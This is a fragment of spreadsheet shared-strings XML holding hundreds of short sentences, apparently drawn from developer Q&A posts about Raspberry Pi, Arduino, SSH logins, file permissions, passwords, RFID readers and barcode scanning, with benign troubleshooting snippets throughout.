    <t>Specifying "" as username and password is apearantly not anonymously enough.</t>
  </si>
  <si>
    <t>An identifier is a unique name for something.</t>
  </si>
  <si>
    <t>Apple Pay allows for payment with iOS devices.</t>
  </si>
  <si>
    <t>Cydia is an iOS app for jailbroken iPhones, iPod Touches and iPads.</t>
  </si>
  <si>
    <t>chardet is a python module for encoding detection.</t>
  </si>
  <si>
    <t>Do not use a bash-style (ASCII) history file, as it would be overwritten and corrupted.</t>
  </si>
  <si>
    <t>The scanning is done by a python script that runs  in a terminal.</t>
  </si>
  <si>
    <t>I am also thinking to make a system out of my Raspberry Pi with QR codes from the students.</t>
  </si>
  <si>
    <t>I guess I will do that and put up with having to enter an SMS code to login my email now and then...</t>
  </si>
  <si>
    <t>Forgot password (letting users pick a new password upon reactivation).</t>
  </si>
  <si>
    <t>I tried using XLib but couldn't get the display to be detected (makes sense why it doesn't work now).</t>
  </si>
  <si>
    <t>The big problem is that when I run my file, I get an error saying that setTimeout() is an unexpected identifier.</t>
  </si>
  <si>
    <t>Basically the LINK you provided, shows the user HACKING the Arduino.</t>
  </si>
  <si>
    <t>its good to know when you have problem about connection and password.</t>
  </si>
  <si>
    <t>Also, when it does work, the raspberry pi goes offline in about 10 minutes (I checked the led's, the whole interface just goes down, even if I'm currently using ssh).</t>
  </si>
  <si>
    <t>Sorry about the image, I just create a demo to show my problem, it's not my app UI, because of security.</t>
  </si>
  <si>
    <t>I have a problem, i want to make a car recognition program on a microchip.</t>
  </si>
  <si>
    <t>After user finished entering value and pressed # key program will continue.</t>
  </si>
  <si>
    <t>After all, seems like is a permissions issue, but i wonder how this went so big, and how permissions changed with a simple operation.</t>
  </si>
  <si>
    <t>Please note that ftpDir is intentionally left blank as this is the root folder for the account on the ftp server.</t>
  </si>
  <si>
    <t>If I remove the SD card, and I run the code, I will not even leave the login screen because the board will detect that there is no SD card inserted.</t>
  </si>
  <si>
    <t>['OAuth2Auth', 'OAuth2ServiceAccountAuth', 'HmacAuthV1Handler'] Check your credentials
Any ideas as to what's happening and why it's only when I run it with sudo?</t>
  </si>
  <si>
    <t>Just to make sure, the "www-data"-user has enough permissions for both folders:
drwx--S--- 3 www-data www-data 4096 Jan 26 17:09 clients
drwx------ 7 www-data www-data 4096 Jan 26 17:11 html
Hope you can help me.</t>
  </si>
  <si>
    <t>It takes a lot of time (20 o 30 seconds, sometimes more), until each screen for the login process is showed.</t>
  </si>
  <si>
    <t>So , the problem is im trying to exit NES emulator through SSH ,it says i need to click ESC to do so , and i want to send a simulated key press to make it work .</t>
  </si>
  <si>
    <t>Is there any python library for waveshare capacitive fingerprint reader to get fingerprint image or its characteristics?</t>
  </si>
  <si>
    <t>I entered my IP Address and Password and hit SAVE and the ESP recycled and connected.</t>
  </si>
  <si>
    <t>The form type is usually a check or credit
card slip.</t>
  </si>
  <si>
    <t>One way we want to try is:
In summary, is there a safe way to save some text to a file that will never corrupt the file?</t>
  </si>
  <si>
    <t>It uses Touch ID for security as well as track shipping and payment information all in one place.</t>
  </si>
  <si>
    <t>Whenever I enter on my Raspberry pi, after typing my password, there is a long pause, then the error ERROR 2003 (HY000): Can't connect to MySQL server (110) shows up.</t>
  </si>
  <si>
    <t>I ran the emplogger_gdocs.py program and entered the client id, secret and spreadsheet key and saved the changes.</t>
  </si>
  <si>
    <t>Now the function execute will make sure, that all special characters are escaped.</t>
  </si>
  <si>
    <t>The PATH is set quite conservatively to make sure that the wrong thing doesn't get run, which would cause security issues.</t>
  </si>
  <si>
    <t>1) If you have changed the alias of the default cert from wso2carbon then make sure to enter the new values to the files listed in [1].</t>
  </si>
  <si>
    <t>The Big-5 character set is a Chinese-character encoding method.</t>
  </si>
  <si>
    <t>Hack provides instantaneous type checking via a local server that watches the filesystem.</t>
  </si>
  <si>
    <t>I have written this code where I process scanned input from barcode scanner.</t>
  </si>
  <si>
    <t>Check that the file has been set to executable permissions with  if it hasn't change with chmod +x /storage/fingi/usr/lib/autossh/autossh</t>
  </si>
  <si>
    <t>All of a sudden it just stopped working so I checked the detector script (using Scapy on a Raspberry Pi) and the buttons were not being detected.</t>
  </si>
  <si>
    <t>It's connecting to the AD server fine (checked event logs), there are no errors when trying it, but for some reason the password won't actually change.</t>
  </si>
  <si>
    <t>I know that's kind of a lot, but does anyone know any better way to accomplish basically the same thing as aliases since mine don't work?</t>
  </si>
  <si>
    <t>The "only" problem then left is to decipher the response to extract only the sender's phone number.</t>
  </si>
  <si>
    <t>First you may need to pretend to be a Logitech keyboard, in the event that certain scan codes are only acted on if the keyboard type matches.</t>
  </si>
  <si>
    <t>4) in raspberry pi problem is that barcode scanner captured or read value is made into "/dev/hidraw0" for example.."that file is created auto when your barcode is connected to your raspi.</t>
  </si>
  <si>
    <t>If it's owned by root, you can either change the ownership, or simply delete it and it will be recreated next time you attempt a login.</t>
  </si>
  <si>
    <t>However, the level of effort is different, and if you can make it hard or risky enough for an attacker, that's probably reasonably good in many situations.</t>
  </si>
  <si>
    <t>This means that the original table is not locked, and clients may continue to read and change data in it.</t>
  </si>
  <si>
    <t>The /var/www/ looks like
html/
    me/
    other/
log/
    me/
    other/
Folder permissions, and here I've seen many people taking ownership and changing permissions but every forum post has its own rules it seems so I've just left it as is.</t>
  </si>
  <si>
    <t>https://github.com/adafruit/Adafruit-Fingerprint-Sensor-Library
However, it seems that currently all of the fingerprint image/feature was store on the chip inside the fingerprint scanner.</t>
  </si>
  <si>
    <t>Microsoft.Azure.Devices.Client.Exceptions.UnauthorizedException:
  'CONNECT failed: RefusedNotAuthorized'
I am not sure what I am missing here though I understand it is an authentication issue, and I have already changed my Hub Uri and device key as mentioned in the tutorial.</t>
  </si>
  <si>
    <t>Apparently I made a wrong configuration of the watchdog running on my Pi, which causes it to reboot in about 10 seconds after it boots up and shows the login script.</t>
  </si>
  <si>
    <t>This requires:
mysql can be access by two clients with different ip, which is already supported;
wordpress should be the same for RPi and Ubuntu, which can be done by nfs share;
nginx should be correctly configured.</t>
  </si>
  <si>
    <t>If the actual file itself is corrupt, then do this:
.Xauthority is not needed on startup, so it is safe to just delete it off your SD card, since a new version will be generated when you boot into the GUI.</t>
  </si>
  <si>
    <t>PayUMoney offers a buyer protection program, according to which customers get an option to release their payments only on a satisfactory purchase.</t>
  </si>
  <si>
    <t>For the moment I do a little experiment with motion on the Raspberry Pi so that I can create my own little cheap security system :p.
So I add a password on the stream for my case  and also to the configuration page sanderpi:8080 so now the user had to insert the password and login to get access.</t>
  </si>
  <si>
    <t>this link provides a possible solution:
insert the following text:
[Service]
ExecStart=-/sbin/agetty --autologin $username --noclear I 38400 linux
make sure that $username is your username
Then reboot.</t>
  </si>
  <si>
    <t>After reboot, and logged as pi, same issue with this errors :
and from there, my attemps to give chmod permissions to /usr/ are useless, because I don't have permissions at all...
most commands dont't work (startx, or else), as I get an error :
- bash: startx: command not found
How can I get out of that situation without restarting from scratch ?</t>
  </si>
  <si>
    <t>I would like to be able to debug the ouput that the script prints in screen from time to time so the "screen" command needs to be used to create a session and ensure that I can login and logoff using putty as needed.</t>
  </si>
  <si>
    <t>I've searched all over the web but everyone seems to say that using bluetoothctl works for them, but in this particular setup where I'd like to be able to have friends pair their own phones, having to trust devices with the RPi out of the car isn't ideal.</t>
  </si>
  <si>
    <t>Traditionally, one could control the locks by simply sending commands through serial connection using something like hyper terminal or putty, but I want to be able to interact with the lock through the server.</t>
  </si>
  <si>
    <t>I've been researching this issue for the past few days and found out that this usually happens when snmp can't find the ssl library crypto, for example if you don't specify -lcrypto before -lsnmp when linking your object, or when the linker just can't can't find -lcrypto.</t>
  </si>
  <si>
    <t>I am trying to use this code for connecting to the WiFi:
But on console I can read following:
I tried to put the wrong data - a WiFi SSID that does not exist, a wrong `password, but no matter what I am still getting the same output: "CONNECTING" and "nil".</t>
  </si>
  <si>
    <t>Here is what happens:
Step one:
.Ino file compiles (Servo.h included) and calls Sampling.h, which recognizes insider tokens of Servo and sets to timmer 2 (just simplifying).</t>
  </si>
  <si>
    <t>When you establish an ssh connection you are creating a new terminal process, the terminal running on your pi's screen won't show typing or commands, that's not how ssh works.</t>
  </si>
  <si>
    <t>If you want not only distinguish between the different connections but directly between different phones (for example to remember special settings for only your phone, not the others) you would have to send an identification over bluetooth to the Arduino (for example the MAC adress of the phone).</t>
  </si>
  <si>
    <t>The easiest way to have a safe and private file share among your friends would be to use an existing service like Dropbox or Google Drive synced to a folder on each of your friends computers.</t>
  </si>
  <si>
    <t>A unique identifier allows the the receiver to take specific action such as displaying a notification message or configuring itself to use a smart device such as a lamp, smart-switch or other sensor.</t>
  </si>
  <si>
    <t>Secure storage of passwords is an important topic, neglect of which can lead to significant security breaches, especially due to password reuse.</t>
  </si>
  <si>
    <t>If you think you found a security issue, please email the details to Rocket.Chats security team at security@rocket.chat before posting it to StackOverflow or any other issue tracker.</t>
  </si>
  <si>
    <t>I'm hoping to write a simple script that will log on to a specific website (email as username, no pw required) and check for changes.</t>
  </si>
  <si>
    <t>PHP Script:
Is this a problem with logging into MySQL via the server instead of localhost or would it be firewall issues (I've set up port forwarding on my router to access the server)?</t>
  </si>
  <si>
    <t>It works fine and fast except one problem:
My Android phone using VOIP (Media5-fone app, but not making any call) reconnects itself every Nx10 minutes without appearing to have been deauthenticated by the server.</t>
  </si>
  <si>
    <t>The solution by @David didn't work for me, but this helped:
https://serverfault.com/questions/950451/mariadb-mysql-shows-have-ssl-disabled-when-certs-are-installled
Turns out that the mysql user needs to own the certificate files.</t>
  </si>
  <si>
    <t>I've seen this issue before on Ubuntu, and normally follow the steps in this answer to resolve it; http://askubuntu.com/questions/463486/can-no-longer-use-screen-share-to-connect-mac-to-ubuntu-since-upgrading-to-14-04 
However as I have no GUI to open dconf-editor I'm not sure where to change the require-encryption setting.</t>
  </si>
  <si>
    <t>Where should I enter username for the Wi-Fi?</t>
  </si>
  <si>
    <t>/var/www/html/image
Here's my code
HTML:
PHP:
My raspberry pi permissions:
My folder permissions
Thank you.</t>
  </si>
  <si>
    <t>I am using IVPORT (multiple camera integration board with raspberry Pi) to do face detection.</t>
  </si>
  <si>
    <t>Incorrect password can often mean that something else is wrong.</t>
  </si>
  <si>
    <t>I had somewhat similar problem on PC - asked for login at first, then didn't ask again.</t>
  </si>
  <si>
    <t>chardet is a python module for encoding detection</t>
  </si>
  <si>
    <t>The hash mark separator in URIs does not belong to the fragment identifier.</t>
  </si>
  <si>
    <t>UserNameStore: similar to PasswordStore but for usernames.</t>
  </si>
  <si>
    <t>Please tell me in case that this is the wrong forum or that you need further information about my electronic/sofware problem.</t>
  </si>
  <si>
    <t>My issue is not really related to this hack.</t>
  </si>
  <si>
    <t>That way, the Raspberry Pi could reposition the vehicle so that the whole QR-code can be captured on camera.</t>
  </si>
  <si>
    <t>I am developing a C application, which allows the user to change their WiFi Password.</t>
  </si>
  <si>
    <t>It is very ironic because I'm already the root of the systems, nevertheless even changing the permissions of the file, would not allow me to change its value.</t>
  </si>
  <si>
    <t>I give all files permissions with chmod+x, but it did not change anything.</t>
  </si>
  <si>
    <t>I know you can bind key presses in tkinter but I can not do that through ssh.</t>
  </si>
  <si>
    <t>However, all keylisteners require display and can't be used over SSH.</t>
  </si>
  <si>
    <t>my guess is 'no' as I don't seem to have access to PerformanceCounters, but perhaps there is a hack that i'm not yet aware of?</t>
  </si>
  <si>
    <t>I encounter with one problem of network discovery.</t>
  </si>
  <si>
    <t>We need to save  into atmega328 chip , for example a user name and password to stay there even after a reset .</t>
  </si>
  <si>
    <t>In the browser, the problem is that if I access the parent folder using http://.../svn/, it asks for the user/password, so this is ok.</t>
  </si>
  <si>
    <t>I don't get any response from the arduino when sending the correct password.</t>
  </si>
  <si>
    <t>If its "AAAA" arduino will read it and unlock door one, if it BBBB then door 2 and etc etc.....</t>
  </si>
  <si>
    <t>Did I buy a fake card ?</t>
  </si>
  <si>
    <t>I have successfully changed the SSH port in the /etc/config/uhttpd file using Terminal.</t>
  </si>
  <si>
    <t>I am trying to implement face recognition using python and Open Cv.</t>
  </si>
  <si>
    <t>I am trying to transmit the ID code of the RFID card with the RF 433MHz sender, but it does not work.</t>
  </si>
  <si>
    <t>EDIT: It would be nice if it could work through ssh.</t>
  </si>
  <si>
    <t>I am able to send keystrokes to the PC, but I want to access if CAPS is pressed.</t>
  </si>
  <si>
    <t>scp command works fine when I run it from terminal without password.My log file has nothing in it(it is blank).</t>
  </si>
  <si>
    <t>I have a raspberry pi that needs to access a service using a username and password.</t>
  </si>
  <si>
    <t>Cannot authenticate card
void loop() {
    // Look for new cards
    if ( !</t>
  </si>
  <si>
    <t>At the moment, I am using a hardware hack.</t>
  </si>
  <si>
    <t>The problem is that with this connection and with the default Raspbian Lite jessy (kernel 4.4) the connected sdcard is not recognized.</t>
  </si>
  <si>
    <t>Input comes from a usb barcode scanner.</t>
  </si>
  <si>
    <t>It prints Syntax error: invalid character in identifier.</t>
  </si>
  <si>
    <t>Well, not really corrupt, but simply incomplete.</t>
  </si>
  <si>
    <t>The error happens only after changing the admin password, with admin/admin everything is working fine.</t>
  </si>
  <si>
    <t>I have the SSID and passphrase which I know to be correct.</t>
  </si>
  <si>
    <t>Please note that these codes work correctly and basically.</t>
  </si>
  <si>
    <t>With the reader I got a keychain tag and identity card tag.</t>
  </si>
  <si>
    <t>The user selects one of them and enters the password for that network.</t>
  </si>
  <si>
    <t>the installation is correct but i am not able to login with the password.</t>
  </si>
  <si>
    <t>Is there a way I can just force the terminal to prompt me for a password when reinstalling?</t>
  </si>
  <si>
    <t>The login activity appears after a couple of minutes.</t>
  </si>
  <si>
    <t>Update the old certificate to be INACTIVE (UpdateCertificate)
Can anyone confirm the correct, most succinct way to do this?</t>
  </si>
  <si>
    <t>I have no HDMI cables, what I should do to connect using ssh without visible devices?</t>
  </si>
  <si>
    <t>The problem that i face is i dont know how to deactivate ok google hotword from hotword.py.</t>
  </si>
  <si>
    <t>All the relevant credentials are correct too.</t>
  </si>
  <si>
    <t>So what I need is some way to let the program "enter" the password for me.</t>
  </si>
  <si>
    <t>However, I keep getting a blank screen and this error : 
MediaException: MEDIA_UNSUPPORTED : Unrecognized file signature!</t>
  </si>
  <si>
    <t>I have done with face detection part with opencv on raspberry pi .</t>
  </si>
  <si>
    <t>I would like to start up raspberry pi without entering a password as pi user.</t>
  </si>
  <si>
    <t>The SSID runs without any problems, but the password always ends up with junk data before it even gets to EEPROM.</t>
  </si>
  <si>
    <t>For me this would mean that the problem happens already before the certificate is to be verified.</t>
  </si>
  <si>
    <t>Today I had troubles with corrupted heap on ESP32.</t>
  </si>
  <si>
    <t>The Raspberry Pi is connected to an RFID scanner.</t>
  </si>
  <si>
    <t>(I had a problem before when the nagios user didn't have permissions, but I fixed this is the sudoers file).</t>
  </si>
  <si>
    <t>The demo Arduino camserver scripts work quite well with the face recognition etc.</t>
  </si>
  <si>
    <t>I am using pyzbar to decode barcodes on Raspberry Pi 3 using Pi Camera v1 (resolution 1296x972).</t>
  </si>
  <si>
    <t>I tried
to solve the VLC deadlock problem</t>
  </si>
  <si>
    <t>to either: 
mount the drive on macOS, which allow me to fix the permission and backup the data
fix the permission on RPi, so the backup and be done via afp://
or, any better suggestions to overcome these obstacles.</t>
  </si>
  <si>
    <t>In there, I did not specify username and password (I kept blank) and it worked just fine.</t>
  </si>
  <si>
    <t>I have set up Raspberry Pi 3b+ for a face detection Project.</t>
  </si>
  <si>
    <t>I'm connected to a Raspberry Pi running Raspbian lite, using PuTTY with SSH.</t>
  </si>
  <si>
    <t>If this is the ascii key, I think you should enter it as
But: if this is really the key for your for your WLAN, you should change it ASAP.</t>
  </si>
  <si>
    <t>You will have to do this anyway, and it may not take nearly as long as trying to hack iOS on a jailbroken phone.</t>
  </si>
  <si>
    <t>Your terminal may be responding to ANSI escape codes.</t>
  </si>
  <si>
    <t>Since the issue seems to be erratic, I would guess you are corrupting your stack.</t>
  </si>
  <si>
    <t>That is, each symbol encoded one bit.</t>
  </si>
  <si>
    <t>Problem was in corrupted memory in JNI code (like buffer overrun).</t>
  </si>
  <si>
    <t>Add ssh key with home computer:
ssh-copy-id is your friend.</t>
  </si>
  <si>
    <t>You have to use 
$db=mysql_connect("example.com.mysql", "username", "password");
mysql_select_db("database", $db);</t>
  </si>
  <si>
    <t>The decoding you need to do depends entirely on the camera you will use.</t>
  </si>
  <si>
    <t>Where the modulation and encoded signal are summed up and thus corrupted.</t>
  </si>
  <si>
    <t>Are you sure that your external hard drive is mounted with the necessary permissions.</t>
  </si>
  <si>
    <t>You can remote access Rpi if both your phone and Rpi are on the same network.</t>
  </si>
  <si>
    <t>Everything else would have to be percent-encoded before being sent.</t>
  </si>
  <si>
    <t>Wikipedia as a convenient summary of ANSI Escape Codes.</t>
  </si>
  <si>
    <t>but, on the other way, you can also install network scanner on your phone.</t>
  </si>
  <si>
    <t>The PORTB hard-coded outputs are really hard to decipher as well.</t>
  </si>
  <si>
    <t>Sometimes the folder where ClickOnce stores its files gets corrupt.</t>
  </si>
  <si>
    <t>For your second query (****EDIT #2****)
Options are :
Password less SSH.</t>
  </si>
  <si>
    <t>You need an input device for entering the password.</t>
  </si>
  <si>
    <t>Another way will be to connect display, than you will have a login to console immediately.</t>
  </si>
  <si>
    <t>Change the permissions of the entire folder</t>
  </si>
  <si>
    <t>Also, could it be that your hardware is connected improperly or that your LED is simply burnt out?</t>
  </si>
  <si>
    <t>You can use two approaches:
* Use two-way authentication between a smart card (e.g.</t>
  </si>
  <si>
    <t>imho you cannot send keystrokes (password) to the login screen.</t>
  </si>
  <si>
    <t>MIFARE PLUS cards are encrypted with AES 128, if i'm not wrong you need a SAM AV2 module from NXP.</t>
  </si>
  <si>
    <t>I always encode the authentication header - 
` 
Or, that token you have, is wrong.</t>
  </si>
  <si>
    <t>Here is something I might do, thought a bit of a hack.</t>
  </si>
  <si>
    <t>This will also corrupt the characters if the Arduino and the LIDAR both try to transmit at the same time.</t>
  </si>
  <si>
    <t>Security and authentication is not an easy problem to solve, nor one that should be underrated.</t>
  </si>
  <si>
    <t>It didnt work for me until I entered the correct pin.</t>
  </si>
  <si>
    <t>Follow the commands for opencv and face recognition : (it worked for me)
Depends on the system.</t>
  </si>
  <si>
    <t>If they log out of the account, and login to any other pi, it will pick up THEIR UUID and adjust the information accordingly.</t>
  </si>
  <si>
    <t>You will need HDMI or maybe there is some hack around
2) get IP and connect with Putty
3) Roll</t>
  </si>
  <si>
    <t>There is only one insider preview version 17761 suppose to working on 3B+.</t>
  </si>
  <si>
    <t>I think you can even find some examples of similar hacks.</t>
  </si>
  <si>
    <t>cryptotokenkit is the Apple's new framework for working with PC/SC smart card in Mac OSX.</t>
  </si>
  <si>
    <t>SCOSTA is a national standard by India for a smart card operating system.</t>
  </si>
  <si>
    <t>A namespace is a container that provides context for identifiers, within which names are unique.</t>
  </si>
  <si>
    <t>Data structures or files may become damaged or corrupt.</t>
  </si>
  <si>
    <t>This allows detection of sophisticated clones.</t>
  </si>
  <si>
    <t>The word botnet stems from the two words robot and network.</t>
  </si>
  <si>
    <t>If you are looking to store passwords, odds are CryptSharp has the algorithm you want.</t>
  </si>
  <si>
    <t>The ICCID (Integrated Circuit Card Identifier) identifies each SIM internationally.</t>
  </si>
  <si>
    <t>The elements of the    dictionary are encoded each key immediately followed by its value.</t>
  </si>
  <si>
    <t>Stable, unique network identifiers.</t>
  </si>
  <si>
    <t>Hardware decoding and display on all platforms.</t>
  </si>
  <si>
    <t>changing the passphrase for a private key.</t>
  </si>
  <si>
    <t>If the username and password
  are entered together, the format is: username/password.</t>
  </si>
  <si>
    <t>Another problem is that users often use the same password for different sites or applications.</t>
  </si>
  <si>
    <t>Activities that display playful cleverness have "hack value".</t>
  </si>
  <si>
    <t>improves robustness : database file is not corrupted even under catastrophic situation.</t>
  </si>
  <si>
    <t>You entered: c o o l
Enter a 1 digit number.</t>
  </si>
  <si>
    <t>If I try it without sudo then I get a return value of 256 as well, so I thought maybe it was a permissions issue with my original script.</t>
  </si>
  <si>
    <t>It has: AppNonce NetID DevAddr DLSettings RxDelay CFList, and is encrypted with the AppKey which is network unique and not node unique.</t>
  </si>
  <si>
    <t>PuTTy hangs after entering password, just no error is produced.</t>
  </si>
  <si>
    <t>For that I have a script with the keys for all folders on my PI in an encrypted folder.</t>
  </si>
  <si>
    <t>Could this swapping of SD cards be a cause (eg., either AWS or some other service they use like overlayFS be taking a fingerprint of the hardware)?</t>
  </si>
  <si>
    <t>I've been facing a problem on how should I receive the fingerprint value from the Arduino UNO to Java and then store it in MySQL.</t>
  </si>
  <si>
    <t>Im making a project that i scan rfid cards to gain access to a door.</t>
  </si>
  <si>
    <t>OwnCloud and external hard drives are tricky and you have a permission issue.</t>
  </si>
  <si>
    <t>Simply put in your code and set the Teensy as a HID device to use it.</t>
  </si>
  <si>
    <t>Or is there an alternative "cleaner" idea than using a Java Applet to access the local USB-connected fingerprint scanner?</t>
  </si>
  <si>
    <t>Unfortunately vehicle manufacturers don't seem to make such information public.</t>
  </si>
  <si>
    <t>The login I edited for the show, but apparently it will not be a single mistake.</t>
  </si>
  <si>
    <t>That puts the smartcard in a state that the malicious tamperer can't guess.</t>
  </si>
  <si>
    <t>Usually useful for displaying a Login form for non-authenticated users and maybe a Welcome UserName!</t>
  </si>
  <si>
    <t>I wrote a test program to check whether getlogin_r() and getlogin() do work or not, because I had problems with them before and could not fix it.</t>
  </si>
  <si>
    <t>Basically, I need to do something like this:
====== Method ============= Required Android Permission =============
=====getLocation()====&gt;===== android.permission.ACCESS_FINE_LOCATION 
=====getBeaconState()===&gt;===== android.permission.ACCESS_FINE_LOCATION
Also, I need to see what happens if the permission required is missing?</t>
  </si>
  <si>
    <t>and i want to check RFID tag is authentic or not so i have to use my web-api using raspberry pi.</t>
  </si>
  <si>
    <t>I've tried changing the fake number to my personal one but it didn't make a difference.</t>
  </si>
  <si>
    <t>I issue the following command on the terminal to check if the iPhone is discoverable by the RPi3.</t>
  </si>
  <si>
    <t>Now I changed Lock: to lock.aqcquire() and it seems much less error or no script timeout happens.</t>
  </si>
  <si>
    <t>First of all, you don't want to be logged as root everytime: just put sudo when you need and type the password.</t>
  </si>
  <si>
    <t>Something like this makes more sense
...
def initialize_locking_doors():
    print('Motion was detected.</t>
  </si>
  <si>
    <t>For example, if the session configuration specifies that cellular networking should not be allowed, the NSURLRequest object cannot request cellular networking.</t>
  </si>
  <si>
    <t>To connect to the database from NetBeans I use the 
New connection wizard
where I select 
MySQL(Connector/J driver)
I leave it all as it is except the password.</t>
  </si>
  <si>
    <t>To fix I would think that logging in via SSH on another computer should work (This can be done by using a tool like Putty on windows) or just ssh into the Linux Terminal (I think this also works for Macs).</t>
  </si>
  <si>
    <t>This means a malicious script could access and modify the database, even without a username and password.</t>
  </si>
  <si>
    <t>Note that the JSP is been placed in /WEB-INF folder to prevent direct access to the JSP when a user enters its URL in the browser address bar.</t>
  </si>
  <si>
    <t>It checks for unlock or lock button press and also checks if the lock is locked or not.</t>
  </si>
  <si>
    <t>But the problem is the raspberry pi wont connect to wifi unless i connect the ethernet cable and make one ssh connection using putty..</t>
  </si>
  <si>
    <t>When using Speech recognition, we should ensure that device has a microphone or the equivalent, and provides the Privacy for Speech, inking, and typing.</t>
  </si>
  <si>
    <t>After using the above parameters and generating the SAS token, I am still facing authorization issue and my device is showing as disconnected in device explorer.</t>
  </si>
  <si>
    <t>caused by: Hyper error
caused by: an error occurred trying to connect: Connection refused (os error 111)
I also see a black screen when I rebooted the Raspberry Pi 3 and see no GUI showing up with the login screen.</t>
  </si>
  <si>
    <t>I set up port forwarding on our home wifi, and I changed the default port for ssh to make it more secure.</t>
  </si>
  <si>
    <t>I've found this: http://seetron.com/archive/html/ht_tip1.htm
The last paragraph says:
Saved configurations can be corrupted in odd ways.</t>
  </si>
  <si>
    <t>Heres the link if you want to check it out: http://support.microsoft.com/kb/925521
If you are already using a test certificate, extending it solves your problem.</t>
  </si>
  <si>
    <t>the gradle plugin automatically discovers OSS license info and a companion library makes it easy to display that info in the UI.</t>
  </si>
  <si>
    <t>The recognition process is made by a third party (remote) API, so there is nothing to worry about it, but the detection is being carried out by the Google Mobile Vision API for Android.</t>
  </si>
  <si>
    <t>The handheld scanners that were replaced by these Pi devices, provided an audio warning tone if something didn't scan correctly (we're assuming it was an ascii generation), which allowed users to be notified of the error.</t>
  </si>
  <si>
    <t>enter image description here
code does not compile giving that expected primary-expression before ',' token mistake.</t>
  </si>
  <si>
    <t>Once you get this working, if you have other projects that will use serial communications, consider making an Arduino that does just this -- make it a trusted device so that you can rule out these problems with a trusted device.</t>
  </si>
  <si>
    <t>On the problem of making your application private, you will need to create an authentication layer, where users will need to log in using username and password, this on top, of course, of the security provided by accessing privately your wifi network.</t>
  </si>
  <si>
    <t>Once the USB is inserted, If there is a code or a piece of data present on the USB; The arduino will confirm that validity of the information, and send a request to a door lock to allow it to unlock.</t>
  </si>
  <si>
    <t>What I already tried was googling around for some similar problems, and someone proposed running this command:
sudo update-ca-certificates --fresh
as well as doing this:
export SSL_CERT_FILE=/etc/ssl/certs/ca-certificates.crt
export SSL_CERT_DIR=/dev/null
However, none of these fixed anything.</t>
  </si>
  <si>
    <t>For this to work, you must ensure your beacon is advertising at least at 10 Hz, otherwise the shorter scan cycles will often miss a detection and actually lead to longer detection times.</t>
  </si>
  <si>
    <t>A unique identifier allows the receiver to take specific action such as displaying a notification message or configuring itself to use a smart device such as a lamp, smart-switch or other sensor.</t>
  </si>
  <si>
    <t>Docker EE enables a secure software supply chain, with image promotion, mirroring between registries, and signing/scanning enforcement for Kubernetes images.</t>
  </si>
  <si>
    <t>As far as i could see on the web, it's not possible to build anything from stratch and just plug in the console due to MS security protocols, so DIY controllers usually have a real controller board in the middle (like this arcade controller http://hacknmod.com/hack/diy-arcade-controller-for-xbox-360/).</t>
  </si>
  <si>
    <t>Is there some existing way to have the Pi create an ad-hoc network, which allows my phone to connect to it directly by selecting it as a wireless network, and then somehow get a mobile app on my phone to share his home network's SSID and password?</t>
  </si>
  <si>
    <t>A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.</t>
  </si>
  <si>
    <t>But when you do it, first the OS has control and either remembers that you are sudo, or prompts something like 
Then mysql gets control and sees the -p, so prompts you:
Enter password: 
During the setup, were you ever asked to create a mysql root password?</t>
  </si>
  <si>
    <t>on{X} is a website, api and android app which allows a developer to remotely write javascript functions triggered by native device events such as unlocking the phone, receiving a phone call, etc.</t>
  </si>
  <si>
    <t>A file that is normally not visible for the user, unless the user requires to show the hidden files by turning a setting in file explorer or using additional switch with command line tools.</t>
  </si>
  <si>
    <t>Deep Freeze is a kernel-level driver that protects hard drive integrity by redirecting information being written to the hard drive or partition, leaving the original data intact.</t>
  </si>
  <si>
    <t>It is a successor to the Nexus 6 featuring a number of major changes, including an all-aluminum based body that is thinner and lighter than the Nexus 6, a rear fingerprint reader called Nexus Imprint, a faster octa-core Snapdragon 810 v2.1 system-on-chip (SoC), an AMOLED display, better cameras, enhanced LTE connectivity, a reversible USB Type-C dock connector, and the removal of wireless charging.</t>
  </si>
  <si>
    <t>Why doesn't it display my login screen automatically?</t>
  </si>
  <si>
    <t>It is as if it is not saving the password for my network.</t>
  </si>
  <si>
    <t>The Fritzing Image is incorrect on the Hackster.io.</t>
  </si>
  <si>
    <t>For Example:
You want to make a password login.</t>
  </si>
  <si>
    <t>Also I could not find anything that would help me enter the username.</t>
  </si>
  <si>
    <t>I have a section of code that works and unlocks the door.</t>
  </si>
  <si>
    <t>Do you have any idea how to decode message correctly?</t>
  </si>
  <si>
    <t>nothing happens, nothing works and nothing is progressing any further than getting netbeans and the RPI to at least connect over SSH.</t>
  </si>
  <si>
    <t>Instead of the "NETWORK_NAME" and "WIFI_PASS" I entered the correct information in my code.</t>
  </si>
  <si>
    <t>Ideally I would never have to log into the device using SSH.</t>
  </si>
  <si>
    <t>I do not know exactly what was the problem but when I was using the ip I was getting from ifconfig I was not able to ssh to my pi when I typed 
I got another ip so I used that and tried to shh to my pi and it is working now</t>
  </si>
  <si>
    <t>According to the error log, it seems the script could not ssh to your server.</t>
  </si>
  <si>
    <t>You are correct in thinking oauth2 is needed.</t>
  </si>
  <si>
    <t>If the device was registered with a certificate that has expired, you could encounter authentication issues.</t>
  </si>
  <si>
    <t>After fixing the username everything works fine for me.</t>
  </si>
  <si>
    <t>However, there seems to be some sort of permissions problem in the actual execution.</t>
  </si>
  <si>
    <t>Is there a sort of hack that might be able to leak information from JavaScript this way?</t>
  </si>
  <si>
    <t>Logging in as root user solves the issue.</t>
  </si>
  <si>
    <t>Here is the php call
Here is the python script
I think it might be the permission problem since I need "sudo" to run the python script in terminal.</t>
  </si>
  <si>
    <t>I have a .jar program used to print barcodes on, guess what, a barcode printer (Zebra)!.</t>
  </si>
  <si>
    <t>I'm trying to build a door unlocking system using a Raspberry Pi.</t>
  </si>
  <si>
    <t>I'm trying to detect user's device is silenced or not ( button on the side of the phone ).</t>
  </si>
  <si>
    <t>I am trying to use an arduino board with NFC shield to be able to unlock the door of my car.</t>
  </si>
  <si>
    <t>Now I'm considering hard-coding my passphrase in ecryptfs itself (or even read it from protected eeprom) so it will work only on my device.</t>
  </si>
  <si>
    <t>When plugged with my keyboard it lauches, when trying from my other computer using ssh, it crash giving the error we see up here.</t>
  </si>
  <si>
    <t>I am new in arduino and I am trying to update the firmware in my Arduino WiFi shield but I am facing some problems.</t>
  </si>
  <si>
    <t>I'm working on detecting license plates with openCV, python and a raspberry pi.</t>
  </si>
  <si>
    <t>My question is, if I never did figure out my password, how would I go about resetting it for the Raspberry Pi 2?</t>
  </si>
  <si>
    <t>The user who uses a verified card can use the functionalities until he scans a card again.</t>
  </si>
  <si>
